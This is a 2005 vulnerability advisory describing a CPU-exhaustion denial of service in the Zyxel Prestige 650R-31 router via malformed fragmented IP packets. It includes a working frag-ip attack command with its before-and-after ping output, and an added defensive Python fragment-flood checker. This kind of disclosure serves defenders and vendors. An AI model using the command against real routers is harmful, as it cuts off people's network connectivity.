
ZyxelIPHandling.txt

14 Aug 2005, reported by Federico Kirschbaum. Type: packetstorm. Source: packetstormsecurity.com

Zyxel Prestige 650R-31 vulnerable to malformed fragmented IP packets, causing 100% CPU usage and denial of connectivity

||   
|| Infobyte Security Research   
|| www.infobyte.com.ar  
|| 04.08.2005   
||  
  
  
.:: SUMMARY  
  
Prestige 650R-31 (ADSL Router)  
-CPU exhaustion when handling malformed fragmented packets  
  
Affected: ZyNOS firmware v3.40(KO.1)  
  
It is suspected that all previous versions of ZyNOS are vulnerable.  
  
.:: BACKGROUND  
  
Zyxel Prestige 600 Series, a popular ADSL modem/router   
www.zyxel.com   
  
  
.:: DESCRIPTION  
  
The Prestige 650R-31 fails to handle malformed fragmented IP packets correctly.  
CPU load rises to 100% while the attack traffic is reassembled and processed.  
  
  
.:: EXPLOIT   
Any IP crafting tool will do the job; in this case we used   
a fragmented IP generator coded by Fryx:  
http://packetstorm.linuxsecurity.com/UNIX/misc/frag.c  
  
<snip>  
  
root@r2d2:~/infobyte# ping 192.168.1.252  
PING 192.168.1.252 (192.168.1.252): 56 octets data  
64 octets from 192.168.1.252: icmp_seq=0 ttl=254 time=2.5 ms  
64 octets from 192.168.1.252: icmp_seq=1 ttl=254 time=2.3 ms  
--- 192.168.1.252 ping statistics ---  
2 packets transmitted, 2 packets received, 0% packet loss  
  
-Prestige Status (Normal)  
Ethernet:  
Status: 100M/Full Duplex Tx Pkts: 71  
Collisions: 0 Rx Pkts: 164  
CPU Load = 4.09%  
  
root@r2d2:~/pentest/infobyte# frag-ip -i 1 -t all -s 7 -p tcp -l 64000 -a 1 170.1.2.3 192.168.1.252  
Sending packets with ID 1 (frags length=56, total length=64000)  
root@r2d2:~/infobyte# ping 192.168.1.252  
PING 192.168.1.252 (192.168.1.252): 56 octets data  
64 octets from 192.168.1.252: icmp_seq=50 ttl=254 time=1002.3 ms   
64 octets from 192.168.1.252: icmp_seq=51 ttl=254 time=7.7 ms   
-- 192.168.1.252 ping statistics ---  
51 packets transmitted, 2 packets received, 93% packet loss  
  
-Prestige Status (During the denial)  
Ethernet:  
Status: 100M/Full Duplex Tx Pkts: 71  
Collisions: 0 Rx Pkts: 164  
CPU Load = 99.59%   
  
<snip>   
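
As an added example, not part of the advisory, here is a small Python checker written from the defender's side: it walks fragment records (source, destination, IP ID, byte offset, payload length, MF flag) and flags streams that look like the one in the transcript, i.e. far more fragments per datagram than a legitimate MTU split would produce, or a claimed reassembled size beyond the IPv4 maximum. The thresholds, field names and sample streams are constructed for this example; the first sample mirrors the 56-byte fragments totalling 64000 bytes under a single IP ID shown above.

```python
from dataclasses import dataclass

# Policy thresholds (hypothetical values chosen for this example).
MAX_FRAGS_PER_DATAGRAM = 64   # a 64 KB datagram split at a 1500-byte MTU needs ~45 fragments
MAX_DATAGRAM_LEN = 65535      # IPv4 maximum total length


@dataclass(frozen=True)
class Frag:
    src: str
    dst: str
    ip_id: int
    offset: int   # byte offset of this fragment's payload (header field * 8)
    length: int   # payload bytes carried by this fragment
    more: bool    # MF flag: more fragments follow


def analyze(frags):
    """Return {(src, dst, ip_id): [reasons]} for fragment streams that break policy.

    Streams are tracked per (src, dst, IP ID), the same key a reassembler uses,
    so a flood of tiny fragments under one ID shows up as one noisy entry."""
    state = {}    # key -> (fragment count, highest byte reached)
    alerts = {}
    for f in frags:
        key = (f.src, f.dst, f.ip_id)
        count, max_end = state.get(key, (0, 0))
        count += 1
        max_end = max(max_end, f.offset + f.length)
        state[key] = (count, max_end)
        reasons = alerts.setdefault(key, [])
        if count > MAX_FRAGS_PER_DATAGRAM and "too many fragments" not in reasons:
            reasons.append("too many fragments")
        if max_end > MAX_DATAGRAM_LEN and "reassembled size exceeds 65535" not in reasons:
            reasons.append("reassembled size exceeds 65535")
    return {k: v for k, v in alerts.items() if v}


def advisory_like_stream():
    """Constructed sample: 64000 payload bytes cut into 56-byte fragments, IP ID 1."""
    total, piece = 64000, 56
    frags = []
    for off in range(0, total, piece):
        length = min(piece, total - off)
        frags.append(Frag("170.1.2.3", "192.168.1.252", 1, off, length, off + length < total))
    return frags


def benign_stream():
    """Constructed sample: one 1500-byte datagram split in two at a 1480-byte boundary."""
    return [Frag("192.168.1.10", "192.168.1.252", 42, 0, 1480, True),
            Frag("192.168.1.10", "192.168.1.252", 42, 1480, 20, False)]
```

Running `analyze(advisory_like_stream())` flags the single-ID stream after its 65th fragment, while the two-fragment benign stream produces no alert.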
  
.:: IMPACT  
  
Total loss of connectivity and forwarding for at least 1 minute.  
The more fragmented packets are sent, the longer the denial  
lasts.  
  
.:: EXTRA  
  
These procedures were carried out locally.  
Remote attacks were not yet attempted.   
  
  
.:: FIX  
The vendor claims it is not a vulnerability but rather a "Hardware Limitation".  
However, the latest release of its firmware appears to fix the problem.   
Upgrade the firmware to V3.40(GT.5).  
  
.:: DISCLOSURE TIMELINE  
  
05/02/2005 Initial vendor notification  
05/03/2005 Initial vendor response  
05/08/2005 Vendor classified the issue as a hardware limitation  
05/10/2005 No response from vendor to several mails  
  
.:: CREDIT  
  
Federico Kirschbaum is credited with discovering this vulnerability.  
fedek][at][infobyte][dot][com][dot][ar  
  
.:: LEGAL NOTICES  
  
Copyright (c) 2005 by [ISR] Infobyte Security Research.  
Permission to redistribute this alert electronically is granted as long as it is not   
edited in any way unless authorized by Infobyte Security Research Response.   
Reprinting the whole or part of this alert in any medium other than electronically   
requires permission from infobyte com ar  
  
Disclaimer  
The information in the advisory is believed to be accurate at the time of publishing   
based on currently available information. Use of the information constitutes acceptance   
for use in an AS IS condition. There are no warranties with regard to this information.   
Neither the author nor the publisher accepts any liability for any direct, indirect, or   
consequential loss or damage arising from use of, or reliance on, this information.  
  
